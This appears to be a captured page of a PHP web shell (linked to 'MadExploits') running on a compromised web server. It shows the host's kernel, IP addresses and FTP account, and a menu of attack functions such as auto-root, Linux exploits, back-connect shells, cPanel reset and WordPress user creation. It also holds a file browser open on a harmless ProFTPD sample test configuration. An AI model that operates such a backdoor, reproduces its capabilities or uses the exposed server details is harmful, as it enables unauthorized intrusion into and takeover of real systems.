Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.213
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
proftpd /
sample-configurations /
[ HOME SHELL ]
Name
Size
Permission
Action
PFTEST.conf.in
1.04
KB
-rw-r--r--
PFTEST.group
15
B
-rw-r--r--
PFTEST.install
1.61
KB
-rwxr-xr-x
PFTEST.passwd
61
B
-rw-r--r--
PFTEST.shadow
34
B
-rw-r--r--
anonymous.conf
3.33
KB
-rw-r--r--
basic.conf
1.87
KB
-rw-r--r--
complex-virtual.conf
10.84
KB
-rw-r--r--
mod_sql.conf
7.97
KB
-rw-r--r--
virtual.conf
2.42
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : PFTEST.conf.in
# # This ProFTPD configuration is intended for unprivileged TESTING ONLY. # See Step 4 in INSTALL. # ServerName "ProFTPD TEST Installation" ServerType standalone DefaultServer on # Use a non-privileged port, rather than the standard ftp port (21). # The ftpd-data port will be one less. Port 2021 User %User% Group %Group% # These must be absolute paths. AuthUserFile %TestDir%/PFTEST.passwd AuthGroupFile %TestDir%/PFTEST.group PidFile %TestDir%/PFTEST.pid ScoreboardFile %TestDir%/PFTEST.score SystemLog %TestDir%/PFTEST.syslog TransferLog %TestDir%/PFTEST.xferlog # Disable some checks. RequireValidShell off UseFtpUsers off UseReverseDNS off WtmpLog off <IfModule mod_ident.c> IdentLookups off </IfModule> # Umask 022 is a good standard umask to prevent new dirs and files # from being group and world writable. Umask 022 # To prevent DoS attacks, set the maximum number of child processes to 5. MaxInstances 5 # Normally, we want files to be overwriteable. <Directory /> AllowOverwrite on </Directory>
Close